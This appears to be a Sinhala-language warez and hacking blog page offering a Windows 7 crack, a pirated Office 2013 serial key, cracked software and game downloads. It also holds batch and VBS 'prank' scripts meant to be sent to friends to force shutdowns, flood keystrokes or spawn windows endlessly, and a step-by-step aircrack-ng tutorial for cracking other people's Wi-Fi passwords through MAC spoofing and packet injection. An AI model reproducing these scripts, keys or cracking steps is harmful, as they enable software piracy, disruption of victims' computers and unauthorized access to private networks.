HellJumperzz

-->

Windows 7 genuine Crack

අද මං ඔයාලට දෙන්න යන්නේ Windows 7 Crack එකක්.. Crack කීවම ඉතින් Internet එකේ ඕනෙ තරම් Crack තියනවනි. ඒත් මේක එහෙම එකක් නෙමෙයි... මේකෙන් Crack කෙරැවොත් කෙරැවම තමා අයෙ ඉතින් Microsoft එකට අල්ලනව තියා හිතන්නවත් බෑ. Desktop එක කලු වෙන්නෙ නෑ. Online windows update කරන්නත් පුලුවන්.. තවත් මොන කථාද Download කරගෙනම බලන්නකෝ.......



0 comments:

Microsoft Office 2013


Serial key -
KDVQM-HMNFJ-P9PJX-96HDF-DJYGX






Microsoft Office Professional Plus 2013 Includes :

  • Microsoft Access 2013
  • Microsoft Excel 2013
  • Microsoft InfoPath 2013
  • Microsoft Lync 2013
  • Microsoft OneNote 2013
  • Microsoft Outlook 2013
  • Microsoft PowerPoint 2013
  • Microsoft Publisher 2013
  • Microsoft SkyDrive Pro 2013
  • Microsoft Visio Viewer 2013
  • Microsoft Word 2013
  • Office Shared Features 2013
  • Office Tools 2013

System Requirements : 

  • Operating System : Windows Vista/7/8
  • CPU: 1 GHz processor
  • RAM: 1GB for x32 / 2GB for x64
  • HDD: 3 GB of available disk space
  • Graphics: DirectX 10-compatible graphics card (optional)



0 comments:

Need for Speed Hot pursuit (Only 50MB Hight Compress)



මෙන්න ඉතින් අදත් පට්ටම පට්ට Game එකක් Need For Speed කියපුවාම දැන් නොදන්න කෙනෙක් නෑනි. මෙක Need For Speed ක්‍රීඩා මාලාවේ Hot Pursuit නැමති සංස්කරනය. වැඩි ගානකුත් නෑ 50MB විතරයි.. Download කරගෙනම බලන්නකෝ... 



Minimum System Requirements :
  • Operating System: Windows XP (SP3)/Vista/7
  • CPU: Intel Core 2 Duo 1.8 GHZ / AMD Athlon X2 64 2.4GHZ
  • RAM: 1.5 GB
  • Graphics: 256 MB DirectX 9.0 compliant card with Shader Model 3.0 or higher
Recommended System Requirements :

  • Opearting System: Windows XP (SP3)/Vista/7
  • CPU: Intel Core 2 Duo E6700 2.6 GHZ / AMD Athlon X2 64 6000+ or better
  • RAM: 1.5 GB
  • Graphics: GeForce 8800 GT or ATI Radeon HD 4700 or better










0 comments:

Fast and Furious Showdown Pc Game Download Highly Compressed

Fast & Faurous කීවොත් දැන් නොදන්න කෙනෙක් නෑනි.. මෙන්න ඒ Film එකකට ආපු පට්ට Game එකක් අරගෙනම Play කරල බලන්නකෝ..










Minimum System Requirements:
* Operating System: Windows@XP / Windows Vista / Windows®7
* Processor: Intel Dual Core @ 2.8 GHz or higher
* Memory: 1 GB of RAM (2 GB for Vista & Win 7 )
* Graphics Card: 256 MB (Nvidia GeForce 7900) Pixel Shader 3.0
* Hard Disk: 3 GB free disk space
* Sound Card DirectX compatible
* DirectX@9.0c  

1 comments:

Windows 7 logon screen changer



Windows 7 Logon Screen එක Change කරගන්න පොඩි Gadget කෑල්ලක්..


0 comments:

Horoscope Matching



මෙන්න ඉතින් තවත් නියමම වැඩ කෑල්ලක්.. ඔයාගෙයි ඔයාගේ ආදරේ කරන ගෑනු ළමයගෙ හදහන් 2ක ගැලපෙනවද කියල බලන්න කියාපු Software එක.. අයේ වැඩි කථා ඕනි නැ.. අරගෙනම බලන්නකෝ..

හැබැයි ඉතින් මේක වැඩ කරන්නෙ.. 32 bit Operating System වල .තමා.. 

මෙන්න මෙතනින් ගන්න මේක

තවත්  Bonus Software එකක්.. ඒක මෙතනින් ගන්න..

0 comments:

R-Studio Data Recovery v.4.5.127437 [Serial] [ENG] [Arx]

ඔබගේ පරිගණකයේ නැති වූ දත්ත නැවත ගැණීමට අයශ්‍යද ? මෙන්න එහෙනම් එයටම කියාපු මෘදුකාංගය. මෙහිදි ඔබගේ පරිගණකයේ නැති වූ ඕනැම දත්තයක් ගත හැක. මෙම මෘදුකාංගය ඔබගේ පරිගණකයට දමාගත් විට ඔබට මෙය අන්තර් ජාලය මගින් යාවත්කාලීන කිරීමේ හැකියාවත් ඇත.



0 comments:

10 Best Note Pad Trick







10 notepad tricks to fool ur frnds
1>
Cycle a message in your friend's computer:

Type :

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as "Anything.BAT" and send it.

2>
Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

3>
Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

4>
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

5>
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

6>
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

7>
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

8>
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.You are a fool.
Save it as "Anything.VBS" and send it.

9>
Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.


10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

0 comments:

Wi-Fi Hacking (Lesson 1)

පලමුව අපගේ පෙර දැමු ලිපියේ Hacking Software එක Download කර ගැනීමට බැරීවීම ගැණ අපගේ බලවත් කනගාටුව පල කරමු..

හරි අපි දැන් පටන් ගමු හරියටම කොහොමද Wi -Fi net work එකක් කොහොමද Hack කරන්නෙ කියලා.



අද මම භාවිතා කරන්න යන්නේ Linux Backtrack යන ක්‍රමයයි..

1) ඔබට පලමුව අවශ්‍ය වනවා හොදට වැඩ කරන Wi - Fi Card එකක්.

2) දැන් ඔබ Linux Backtrack ඔබගේ මෙහෙයුම් පද්දතියට ගැලපෙන Version එක මෙතනින් අර ගන්න.

3)  දැනට භාවිතා කරන Pass Word List එකක් මෙතනින් අර ගන්න. මෙය ඔබට Google වලින් ගත හැකිය.

4) මම හිතෙනවා දැන් ඔබ Linux Backtrack එක Download කරගෙන ඇති කියලා.

5) දැන් මෙය ඔබ CD එකකට Write කරගන්න.. දැන් එය භාවිතයෙන් ඔබගේ පරිගණකය Boot කරගන්න.

6) දැන් ඔබට ඔබගේ පරිගණකයේ DOS තිරයක් දිස්වේවි.

ඔබ පලමුව මෙම කේතය භාවිතා කරන්න.

     airmon-ng - මෙම කේතය භාවිතයෙන් දැනට ඇති Wi - Fi Net work බලාගත හැකිය

 

7) දැන් ඔබ මෙම කේතය භාවිතයෙන් ඔබ තෝරාගත් Wi - Fi Net work එක ක්‍රියාකාරි තත්වයේ තියනවාද කියා බලාගත හැක.



airmon-ng stop (interface)
ifconfig (interface) down
macchanger —mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)


8) දැන් පහත ඇති ආකාරයට ඔබටගේ පරිගණක තිරයේ දිස්වනවාද කියා බලන්න.









 9) දැන් මෙම කේතය බාවිතයෙන් එය Run කර ගන්න.
              airodump-ng (interface)


10)
 



දැන් ඔබගේ තිරය මෙම ආකාරයට දිස්වෙනවාද කියා බලන්න..



11) දැන් මෙම කේතය භාවිතයෙන් ඔබ භාවිතා කරන Net work එකේ තොරතුරැ එකතු කරගන්න.

airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)


12)  දැන් මෙම Shift+Insert key භාවිතයෙන් එම කේත ඩොස් තිරයට Past කර ගන්න. මම භාවිතා කරන්නෙ yoyo Net work එක Crack කිරීම සදහා.





 13) දැන් මෙම කේතය ඇතුලත් කර ගන්න..

  aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

 14) දැන් ඔබ ESSID හෝ  SSID access point's එක තිරයේ දිස් වනු ඇත.
      ඔබ බාවිතා කරන්නට තීරනය කල Net Work එකත් තිරයේ දිස් වනු ඇත.






15) දැන් වෙලාව Hack කිරීමට.
        
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) මෙම කේතය භාවිතයෙන් ඔබට Hack කිරීමට අවශ්‍ය Net work Router එකට ඇතුල්විය හැත මෙහි ඉහත මම රතුපාටින් කර ඇති IP ලිපිනය ඇති තැනට ඔබගේ තිරයේ ඔබට Crack කිරීමට තෝරාගත් IP ලිපිනය ලබා දෙන්න.


16)



  දැන් ඉහත පරිදි ඔබගේ පරිගණක තිරය දිස්වනු ඇත.



17) දැන් මෙම කේතය භාවිතයෙන් aircrack-ng -b (bssid) (file name-01.cap) ඔබ තෝරාගත් Net Work එක Crack කරගන්න.


18) දැන් ඔබට පහත පරිදි ඔබ භාවිතා කිරිමට තෝරා ගත් Wi - Fi Net Work එකේ Pass Word එක දිස්වේවි.

ඔබට තවත් දැන ගැනීමට අවශ්‍ය නම් පහතින් ඇති Video ව නරඔන්න.





0 comments: